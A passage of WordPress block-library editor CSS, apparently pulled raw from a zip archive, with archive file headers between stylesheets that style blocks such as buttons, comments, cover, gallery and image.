#004a59); } :root .editor-styles-wrapper .has-nightshade-gradient-background{ background:linear-gradient(-135deg, #330968, #31cdcf); } :root .editor-styles-wrapper .has-midnight-gradient-background{ background:linear-gradient(-135deg, #020381, #2874fc); } :where(.editor-styles-wrapper) .has-regular-font-size{ font-size:16px; } :where(.editor-styles-wrapper) .has-larger-font-size{ font-size:42px; } :where(.editor-styles-wrapper) iframe:not([frameborder]){ border:0; }PK!Pš dist/block-library/reset-rtl.cssnuȯhtml :where(.editor-styles-wrapper){ background:#fff; color:initial; font-family:serif; font-size:medium; line-height:normal; } :where(.editor-styles-wrapper) .wp-align-wrapper{ max-width:840px; } :where(.editor-styles-wrapper) .wp-align-wrapper.wp-align-full,:where(.editor-styles-wrapper) .wp-align-wrapper>.wp-block{ max-width:none; } :where(.editor-styles-wrapper) .wp-align-wrapper.wp-align-wide{ max-width:840px; } :where(.editor-styles-wrapper) a{ transition:none; } :where(.editor-styles-wrapper) code,:where(.editor-styles-wrapper) kbd{ background:inherit; font-family:monospace; font-size:inherit; margin:0; padding:0; } :where(.editor-styles-wrapper) p{ font-size:revert; line-height:revert; margin:revert; } :where(.editor-styles-wrapper) ol,:where(.editor-styles-wrapper) ul{ box-sizing:border-box; list-style-type:revert; margin:revert; padding:revert; } :where(.editor-styles-wrapper) ol ol,:where(.editor-styles-wrapper) ol ul,:where(.editor-styles-wrapper) ul ol,:where(.editor-styles-wrapper) ul ul{ margin:revert; } :where(.editor-styles-wrapper) ol li,:where(.editor-styles-wrapper) ul li{ margin:revert; } :where(.editor-styles-wrapper) ol ul,:where(.editor-styles-wrapper) ul ul{ list-style-type:revert; } :where(.editor-styles-wrapper) h1,:where(.editor-styles-wrapper) h2,:where(.editor-styles-wrapper) h3,:where(.editor-styles-wrapper) h4,:where(.editor-styles-wrapper) h5,:where(.editor-styles-wrapper) h6{ color:revert; font-size:revert; font-weight:revert; line-height:revert; margin:revert; } :where(.editor-styles-wrapper) select{ -webkit-appearance:revert; background:revert; border:revert; border-radius:revert; box-shadow:revert; color:revert; cursor:revert; font-family:system-ui; font-size:revert; font-weight:revert; line-height:revert; margin:revert; max-width:revert; min-height:revert; outline:revert; padding:revert; text-shadow:revert; transform:revert; vertical-align:revert; } :where(.editor-styles-wrapper) select:disabled,:where(.editor-styles-wrapper) select:focus{ background-color:revert; background-image:revert; border-color:revert; box-shadow:revert; color:revert; cursor:revert; text-shadow:revert; transform:revert; }PK!qfHNN.dist/block-library/editor-elements-rtl.min.cssnu[.wp-element-button{cursor:revert}.wp-element-button[role=textbox]{cursor:text}PK!ZKYY*dist/block-library/editor-elements-rtl.cssnu[.wp-element-button{ cursor:revert; } .wp-element-button[role=textbox]{ cursor:text; }PK!:''#dist/block-library/elements-rtl.cssnu[.wp-element-button{ cursor:pointer; }PK!Q %%dist/block-library/editor.cssnuȯ.wp-block-archives .wp-block-archives{ border:0; margin:0; } .wp-block-audio{ margin-left:0; margin-right:0; position:relative; } .wp-block-audio.is-transient audio{ opacity:.3; } .wp-block-audio .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .wp-block-avatar__image img{ width:100%; } .wp-block-avatar.aligncenter .components-resizable-box__container{ margin:0 auto; } .wp-block[data-align=center]>.wp-block-button{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align=right]>.wp-block-button{ text-align:right; } .wp-block-button{ cursor:text; position:relative; } .wp-block-button:focus{ box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:-2px; } .wp-block-button[data-rich-text-placeholder]:after{ opacity:.8; } div[data-type="core/button"]{ display:table; } .wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{ margin:0; } .wp-block-buttons>.block-list-appender{ align-items:center; display:inline-flex; } .wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{ justify-content:flex-start; } .wp-block-buttons>.wp-block-button:focus{ box-shadow:none; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{ margin-left:auto; margin-right:auto; margin-top:0; width:100%; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{ margin-bottom:0; } .wp-block[data-align=center]>.wp-block-buttons{ align-items:center; justify-content:center; } .wp-block[data-align=right]>.wp-block-buttons{ justify-content:flex-end; } .wp-block-categories ul{ padding-left:2.5em; } .wp-block-categories ul ul{ margin-top:6px; } [data-align=center] .wp-block-categories{ text-align:center; } .wp-block-categories__indentation{ padding-left:16px; } .wp-block-code code{ background:none; } .wp-block-columns :where(.wp-block){ margin-left:0; margin-right:0; max-width:none; } html :where(.wp-block-column){ margin-bottom:0; margin-top:0; } .wp-block-comments__legacy-placeholder,.wp-block-post-comments{ box-sizing:border-box; } .wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{ float:left; } .wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{ float:right; } .wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{ clear:both; content:""; display:table; } .wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{ clear:both; list-style:none; margin:0; padding:0; } .wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{ min-height:2.25em; padding-left:3.25em; } .wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{ font-size:1em; line-height:1.8; margin:1em 0; } .wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{ list-style:none; margin:0; padding:0; } .wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{ line-height:1.5; } .wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{ border-radius:1.5em; display:block; float:left; height:2.5em; margin-right:.75em; margin-top:.5em; width:2.5em; } .wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{ font-style:normal; } .wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{ font-size:.875em; line-height:1.5; } .wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{ font-weight:400; } .wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{ display:block; margin-bottom:1em; margin-top:1em; } .wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{ font-size:.875em; } .wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{ margin-bottom:0; } .wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-left:.5em; } .wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{ font-size:.875em; margin-bottom:1.4em; } .wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{ padding:calc(.667em + 2px); } :where(.wp-block-post-comments input[type=submit],.wp-block-comments__legacy-placeholder input[type=submit]){ border:none; } .wp-block-comments{ box-sizing:border-box; } .block-library-comments-toolbar__popover .components-popover__content{ min-width:230px; } .wp-block-comments__legacy-placeholder *{ pointer-events:none; } .wp-block-comment-author-avatar__placeholder{ border:1px dashed; height:100%; width:100%; stroke:currentColor; stroke-dasharray:3; } .wp-block[data-align=center]>.wp-block-comments-pagination{ justify-content:center; } :where(.editor-styles-wrapper) .wp-block-comments-pagination{ max-width:100%; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ font-size:inherit; } .wp-block-comments-pagination-numbers a{ text-decoration:underline; } .wp-block-comments-pagination-numbers .page-numbers{ margin-right:2px; } .wp-block-comments-pagination-numbers .page-numbers:last-child{ margin-right:0; } .wp-block-comments-title.has-background{ padding:inherit; } .wp-block-cover.is-placeholder{ align-items:stretch; display:flex; min-height:240px; padding:0 !important; } .wp-block-cover.is-placeholder .components-placeholder.is-large{ justify-content:flex-start; z-index:1; } .wp-block-cover.is-placeholder:focus:after{ min-height:auto; } .wp-block-cover.components-placeholder h2{ color:inherit; } .wp-block-cover.is-transient{ position:relative; } .wp-block-cover.is-transient:before{ background-color:#fff; content:""; height:100%; opacity:.3; position:absolute; width:100%; z-index:1; } .wp-block-cover.is-transient .wp-block-cover__inner-container{ z-index:2; } .wp-block-cover .components-spinner{ left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); } .wp-block-cover .wp-block-cover__inner-container{ margin-left:0; margin-right:0; text-align:left; } .wp-block-cover .wp-block-cover__placeholder-background-options{ width:100%; } .wp-block-cover .wp-block-cover__image--placeholder-image{ bottom:0; left:0; position:absolute; right:0; top:0; } [data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{ max-width:420px; width:100%; } .block-library-cover__reset-button{ margin-left:auto; } .block-library-cover__resize-container{ bottom:0; left:0; min-height:50px; position:absolute !important; right:0; top:0; } .components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{ overflow:visible; pointer-events:none; } .block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{ background-attachment:scroll; } .color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){ margin-top:24px; } .wp-block-details summary div{ display:inline; } .wp-block-embed{ clear:both; margin-left:0; margin-right:0; } .wp-block-embed.is-loading{ display:flex; justify-content:center; } .wp-block-embed .wp-block-embed__placeholder-input{ flex:1 1 auto; } .wp-block-embed .components-placeholder__error{ word-break:break-word; } .wp-block-post-content .wp-block-embed__learn-more a{ color:var(--wp-admin-theme-color); } .block-library-embed__interactive-overlay{ bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; } .wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{ max-width:360px; width:100%; } .wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{ min-width:280px; } .wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{ height:auto; } .wp-block[data-align=center]>.wp-block-file{ text-align:center; } .wp-block-file{ align-items:center; display:flex; flex-wrap:wrap; justify-content:space-between; margin-bottom:0; } .wp-block-file .components-resizable-box__container{ margin-bottom:1em; } .wp-block-file .wp-block-file__preview{ height:100%; margin-bottom:1em; width:100%; } .wp-block-file .wp-block-file__preview-overlay{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-file .wp-block-file__content-wrapper{ flex-grow:1; } .wp-block-file a{ min-width:1em; } .wp-block-file a:not(.wp-block-file__button){ display:inline-block; } .wp-block-file .wp-block-file__button-richtext-wrapper{ display:inline-block; margin-left:.75em; } .wp-block-form-input .is-input-hidden{ background:repeating-linear-gradient(45deg, #0000, #0000 5px, currentColor 0, currentColor 6px); border:1px dashed; box-sizing:border-box; font-size:.85em; opacity:.3; padding:.5em; } .wp-block-form-input .is-input-hidden input[type=text]{ background:#0000; } .wp-block-form-input.is-selected .is-input-hidden{ background:none; opacity:1; } .wp-block-form-input.is-selected .is-input-hidden input[type=text]{ background:unset; } .wp-block-form-submission-notification>*{ background:repeating-linear-gradient(45deg, #0000, #0000 5px, currentColor 0, currentColor 6px); border:1px dashed; box-sizing:border-box; opacity:.25; } .wp-block-form-submission-notification.is-selected>*,.wp-block-form-submission-notification:has(.is-selected)>*{ background:none; opacity:1; } .wp-block-form-submission-notification.is-selected:after,.wp-block-form-submission-notification:has(.is-selected):after{ display:none !important; } .wp-block-form-submission-notification:after{ align-items:center; display:flex; font-size:1.1em; height:100%; justify-content:center; left:0; position:absolute; top:0; width:100%; } .wp-block-form-submission-notification.form-notification-type-success:after{ content:attr(data-message-success); } .wp-block-form-submission-notification.form-notification-type-error:after{ content:attr(data-message-error); } .wp-block-freeform.block-library-rich-text__tinymce{ height:auto; } .wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{ line-height:1.8; } .wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{ margin-left:0; padding-left:2.5em; } .wp-block-freeform.block-library-rich-text__tinymce blockquote{ border-left:4px solid #000; box-shadow:inset 0 0 0 0 #ddd; margin:0; padding-left:1em; } .wp-block-freeform.block-library-rich-text__tinymce pre{ color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; white-space:pre-wrap; } .wp-block-freeform.block-library-rich-text__tinymce>:first-child{ margin-top:0; } .wp-block-freeform.block-library-rich-text__tinymce>:last-child{ margin-bottom:0; } .wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce a{ color:var(--wp-admin-theme-color); } .wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{ background:#e5f5fa; border-radius:2px; box-shadow:0 0 0 1px #e5f5fa; margin:0 -2px; padding:0 2px; } .wp-block-freeform.block-library-rich-text__tinymce code{ background:#f0f0f0; border-radius:2px; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:14px; padding:2px; } .wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{ background:#ddd; } .wp-block-freeform.block-library-rich-text__tinymce .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-freeform.block-library-rich-text__tinymce .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-freeform.block-library-rich-text__tinymce .aligncenter{ display:block; margin-left:auto; margin-right:auto; } .wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{ background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC); background-position:50%; background-repeat:no-repeat; background-size:1900px 20px; cursor:default; display:block; height:20px; margin:15px auto; outline:0; width:96%; } .wp-block-freeform.block-library-rich-text__tinymce img::selection{ background-color:initial; } .wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{ -ms-user-select:element; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{ margin:0; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{ display:block; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{ -webkit-user-drag:none; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{ margin:0; padding-top:.5em; } .wp-block-freeform.block-library-rich-text__tinymce .wpview{ border:1px solid #0000; clear:both; margin-bottom:16px; position:relative; width:99.99%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{ background:#0000; display:block; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{ display:none; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{ border:1px dashed #ddd; padding:10px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{ border:1px solid #ddd; margin:0; padding:1em 0; word-wrap:break-word; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{ margin:0; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{ border-color:#0000; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{ display:block; font-size:32px; height:32px; margin:0 auto; width:32px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{ clear:both; content:""; display:table; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce .gallery a{ cursor:default; } .wp-block-freeform.block-library-rich-text__tinymce .gallery{ line-height:1; margin:auto -6px; overflow-x:hidden; padding:6px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{ box-sizing:border-box; float:left; margin:0; padding:6px; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{ margin:0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{ font-size:13px; margin:4px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{ width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{ width:50%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{ width:33.3333333333%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{ width:25%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{ width:20%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{ width:16.6666666667%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{ width:14.2857142857%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{ width:12.5%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{ width:11.1111111111%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img{ border:none; height:auto; max-width:100%; padding:0; } div[data-type="core/freeform"]:before{ border:1px solid #ddd; outline:1px solid #0000; } @media not (prefers-reduced-motion){ div[data-type="core/freeform"]:before{ transition:border-color .1s linear,box-shadow .1s linear; } } div[data-type="core/freeform"].is-selected:before{ border-color:#1e1e1e; } div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{ margin-top:0; padding-top:0; } div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{ clear:both; content:""; display:table; } .mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{ color:#1e1e1e; } .mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{ margin-left:8px; margin-right:0; } .mce-toolbar-grp .mce-btn i{ font-style:normal; } .block-library-classic__toolbar{ border:1px solid #ddd; border-bottom:none; border-radius:2px; display:none; margin:0 0 8px; padding:0; position:sticky; top:0; width:auto; z-index:31; } div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{ border-color:#1e1e1e; display:block; } .block-library-classic__toolbar .mce-tinymce{ box-shadow:none; } @media (min-width:600px){ .block-library-classic__toolbar{ padding:0; } } .block-library-classic__toolbar:empty{ background:#f5f5f5; border-bottom:1px solid #e2e4e7; display:block; } .block-library-classic__toolbar:empty:before{ color:#555d66; content:attr(data-placeholder); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:37px; padding:14px; } .block-library-classic__toolbar div.mce-toolbar-grp{ border-bottom:1px solid #1e1e1e; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{ height:auto !important; width:100% !important; } .block-library-classic__toolbar .mce-container-body.mce-abs-layout{ overflow:visible; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{ position:static; } .block-library-classic__toolbar .mce-toolbar-grp>div{ padding:1px 3px; } .block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){ display:none; } .block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{ display:block; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ height:50vh !important; } @media (min-width:960px){ .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){ height:9999rem; } .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{ height:100%; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{ height:calc(100% - 52px); } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{ display:flex; flex-direction:column; height:100%; min-width:50vw; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{ display:flex; flex-direction:column; flex-grow:1; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ flex-grow:1; height:10px !important; } } .block-editor-freeform-modal__actions{ margin-top:16px; } :root :where(figure.wp-block-gallery){ display:block; } :root :where(figure.wp-block-gallery)>.blocks-gallery-caption{ flex:0 0 100%; } :root :where(figure.wp-block-gallery)>.blocks-gallery-media-placeholder-wrapper{ flex-basis:100%; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice.is-error{ display:block; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice__content{ margin:4px 0; } :root :where(figure.wp-block-gallery) .wp-block-image .components-notice__dismiss{ position:absolute; right:5px; top:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .components-placeholder__label{ display:none; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{ margin-bottom:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder{ margin:0; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder .components-placeholder__label{ display:flex; } :root :where(figure.wp-block-gallery) .block-editor-media-placeholder figcaption{ z-index:2; } :root :where(figure.wp-block-gallery) .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .gallery-settings-buttons .components-button:first-child{ margin-right:8px; } .blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{ outline:none; } .blocks-gallery-item figure.is-selected:before{ bottom:0; box-shadow:0 0 0 1px #fff inset, 0 0 0 3px var(--wp-admin-theme-color) inset; content:""; left:0; outline:2px solid #0000; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .blocks-gallery-item figure.is-transient img{ opacity:.3; } .blocks-gallery-item .block-editor-media-placeholder{ height:100%; margin:0; } .blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{ display:flex; } .wp-block-gallery ul.blocks-gallery-grid{ margin:0; padding:0; } @media (min-width:600px){ .wp-block-update-gallery-modal{ max-width:480px; } } .wp-block-update-gallery-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-group .block-editor-block-list__insertion-point{ left:0; right:0; } [data-type="core/group"].is-selected .block-list-appender{ margin-left:0; margin-right:0; } [data-type="core/group"].is-selected .has-background .block-list-appender{ margin-bottom:18px; margin-top:18px; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ gap:inherit; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-default-block-appender__content,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ display:inherit; flex:1; flex-direction:inherit; width:100%; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child:after{ border:1px dashed; content:""; display:flex; flex:1 0 40px; min-height:38px; pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child{ pointer-events:none; } .wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-button-block-appender,.wp-block-group.is-layout-flex.block-editor-block-list__block>.block-list-appender:only-child .block-editor-inserter{ pointer-events:all; } .block-library-html__edit .block-library-html__preview-overlay{ height:100%; left:0; position:absolute; top:0; width:100%; } .block-library-html__edit .block-editor-plain-text{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; display:block; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; } @media (min-width:600px){ .block-library-html__edit .block-editor-plain-text{ font-size:13px !important; } } .block-library-html__edit .block-editor-plain-text:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid #0000 !important; } .block-library-html__edit .block-editor-plain-text{ direction:ltr; } .wp-block-image.wp-block-image .block-editor-media-placeholder.is-small{ min-height:60px; } figure.wp-block-image:not(.wp-block){ margin:0; } .wp-block-image{ position:relative; } .wp-block-image .is-applying img,.wp-block-image.is-transient img{ opacity:.3; } .wp-block-image figcaption img{ display:inline; } .wp-block-image .components-spinner{ left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); } .wp-block-image__placeholder{ aspect-ratio:4/3; } .wp-block-image__placeholder.has-illustration:before{ background:#fff; opacity:.8; } .wp-block-image__placeholder .components-placeholder__illustration{ opacity:.1; } .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ left:0; margin:-1px 0; position:absolute; right:0; } @media (min-width:600px){ .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{ margin:-1px; } } [data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{ height:auto; width:100%; } .wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{ display:table; } .wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{ caption-side:bottom; display:table-caption; } .wp-block[data-align=left]>.wp-block-image{ margin:.5em 1em .5em 0; } .wp-block[data-align=right]>.wp-block-image{ margin:.5em 0 .5em 1em; } .wp-block[data-align=center]>.wp-block-image{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align]:has(>.wp-block-image){ position:relative; } .wp-block-image__crop-area{ max-width:100%; overflow:hidden; position:relative; width:100%; } .wp-block-image__crop-area .reactEasyCrop_Container{ pointer-events:auto; } .wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{ border:none; border-radius:0; } .wp-block-image__crop-icon{ align-items:center; display:flex; justify-content:center; min-width:48px; padding:0 8px; } .wp-block-image__crop-icon svg{ fill:currentColor; } .wp-block-image__zoom .components-popover__content{ min-width:260px; overflow:visible !important; } .wp-block-image__toolbar_content_textarea__container{ padding:8px; } .wp-block-image__toolbar_content_textarea{ width:250px; } .wp-block-latest-posts>li{ overflow:hidden; } .wp-block-latest-posts li a>div{ display:inline; } :root :where(.wp-block-latest-posts){ padding-left:2.5em; } :root 